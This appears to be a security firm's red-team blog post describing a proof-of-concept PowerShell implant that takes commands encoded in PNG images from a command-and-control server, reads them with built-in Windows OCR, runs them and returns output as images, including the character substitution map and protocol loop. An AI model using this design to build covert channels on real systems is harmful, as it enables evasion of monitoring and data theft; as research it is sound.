#CQLabs – Implementing Proof-of-Concept C2 with Microsoft OCR

Author: Adrian Denkiewicz, Cybersecurity Expert at CQURE

During the security assessments, one of the things that we always check is the possibility to extract information outside of the client network. This includes the ability to copy data to external drivers, send them via e-mail to external e-mail addresses, use various TCP/UDP ports, non-typical protocols or even side channels. In mature environments, special DLP policies, secure proxies (proxies that are able to peek into encrypted traffic) and deep packet inspection are significantly raising the bar, but they still can be bypassed by steganography and other sophisticated techniques.

There are many interesting projects, many of them are open-source, that find clever ways to exfiltrate the information. It would be fair to say that the more popular the tool, the more chances that techniques and payloads are going to be flagged by AV software. Niche projects tend to explore new ideas, and those ideas, if proven to be reliable, are later integrated with bigger projects.

In this article, we will cover a rather crazy idea: PoC (Proof-Of-Concept) for PowerShell based implant which executes commands sent in the form of PNG images. It will also be able to create new images with the command output and report it back to C2. The typical monitoring software is analyzing file metadata and hidden properties but it is not likely to analyze the very graphic itself. The C2 could be hosted anywhere on private infrastructure but it could also be based on popular image hosting services. In CQURE’s 1 Day to Maintain Stealth Communication Mastery we are showing how to reconfigure meterpreter’s reverse_http(s) module to pretend that it works with image blobs. This could be easily connected with this article’s PoC.

The most important thing: our PowerShell code will not have any external dependencies. The optical character recognition (OCR) functionality is offered by Windows system itself. Although it doesn’t work as good as other solutions on the market, the fact that it’s available out of the box makes it a clear winner. The API documentation can be found here: https://docs.microsoft.com/en-us/uwp/api/windows.media.ocr. It does not offer much customization, other than selecting a specific language. For the purpose of the PoC, we will use default profile language but on non-English systems that may not be a perfect solution.

The usage of Windows.Media.Ocr.OcrEngine in PowerShell isn’t straightforward. Fortunately, there is https://github.com/HumanEquivalentUnit/PowerShell-Misc project that has already taken care of all necessary wrappers. Combining that code with some modifications, I’ve created PowerShell module and basic test scenarios for it.

Having PowerShell module is just a beginning, though. The methods from original code were slightly improved – the Export-StringToPng function uses Calibri font, with an increased font size, so that OCR function has easier job to recognize the characters. Font family and size can be set through extra parameters if needed. There are still dozens of characters that OCR is not able to recognize with enough accuracy. For instance, almost every special character will cause some problems. The simplest workaround? Use a limited character set. BASE64 encoded strings are very good candidates as they contain almost exclusively alphanumeric characters.

However, even some of the alphanumeric characters, when written with most of the fonts, are very similar. People are having a hard time distinguishing between lowercase l and 1, between 0 and 0.

OCR struggles with exactly the same problem. Moreover, Microsoft’s OCR often cannot reliably tell if O is an uppercase or lowercase letter. Sure, we could analyze the size of surrounding characters, but out-of-box OCR just doesn’t do that. Most of the time, the data that we’re processing is case-insensitive (base64 surely is), so not being able to properly recognize the characters may be a serious issue.

I’ve managed to pinpoint the problematic characters and have chosen such replacements for them, that OCR is able to handle. There may be better candidates, but for the purpose of this article, let’s use the following replacement map:

"l" => ".A"
"1" => ".B"
"L" => ".C"
"i" => ".D"
"I" => ".E"
"o" => ".F"
"O" => ".G"
"0" => ".H"
"w" => ".J"
"W" => ".K"
"=" => ".Q"

As you can see, the equal sign is also on the list. Depending on the input, encoded string may have zero, one or two = characters at the end. The last case is problematic, as OCR may assume that this is just a stretched version of single equal character.

The identified characters need to be replaced before base64 string is saved to an image, and replaced back after they are read by the OCR. Simple as that. During my test, OCR was able to correctly decode 100% of base64 encoded strings.

Now that we have the ability to work with encoded text stored on images, we should implement basic command execution logic. We could reuse already implemented module on server-side as well (mostly reusing the same code), but I decided to use python instead. Although PowerShell Core is a multi platform solution, I feel like simple python code is still much more portable and easier to extend.

On server-side, I’ve used PyTesseract module which is definitively more powerful but requires to be trained for a given scenario. I’ve skipped the training part and simply started using it. The results are not always perfect, sometimes single characters are not recognized properly, but for the PoC purposes that’s still good enough.

Here’s how an example communication goes:

1. Server-side logic reads commands from stdin, encodes them as images and starts serving them using simple HTTP server.

2. The client sends HEAD request to the C2 web server for new image. If the image has been recently modified, client downloads the new version to process. Otherwise, client sleeps for a few seconds and tries again.

3. The downloaded image is read with the help of OCR. The command is decoded and executed using PowerShell.

4. The output of the command is encoded and written to an image. The image is sent to the server using PUT method. Server-side code uses tesseract to read output, then decodes it and displays to the console.

5. Go to 1.

There are only a few supported corner cases, i.e. when OCR is not able to recognize the base64 string, it sends a null request to the server. The server then displays an error in the console.

The server-side code is mostly reimplementation of the same methods using Python3. In case of any problems with the response decoding, the script tries various other methods (generally UTF-8 is used but sometimes base64 decoding result in invalid byte sequences).

The simplest example of the generated image is:

The sequences of <dot><letter> pairs must be replaced by predefined values, and then the string is base64-decoded to get the original value. It decodes to hello world string, a result of echo hello world command sent from C2.

This is how example session goes:

As you can see, these commands were successfully executed on the client-side, but the responses were not completely recognized by the server-side code. That’s something that can be fixed if Tesseract is better trained for the given scenario. http://trainyourtesseract.com/ could be used to train Tesseract using custom fonts.

Techniques like these may be particularly useful in non-typical environments or scenarios where traffic is heavily restricted. OCR-based communication may not guarantee enough integrity, but the technique is rather interesting and, on the client-side, uses only built-in features. The scripts are rather trivial to understand and easy to extend.

Perhaps we should now see if Microsoft’s Speech Synthesis and Recognition understand each other?

Adrian Denkiewicz, Cybersecurity Specialist at CQURE, Ethical Hacker, Penetration Tester, Red Teamer, Software Developer and Trainer. Adrian is deeply interested in offensive side of security, ranging from modern web attacks, through operating system internals, to low level exploit development. Passionate about learning a bit of everything, but mostly things related to  astronomy and rocket science – Adrian has even completed online rocket science course!

Comments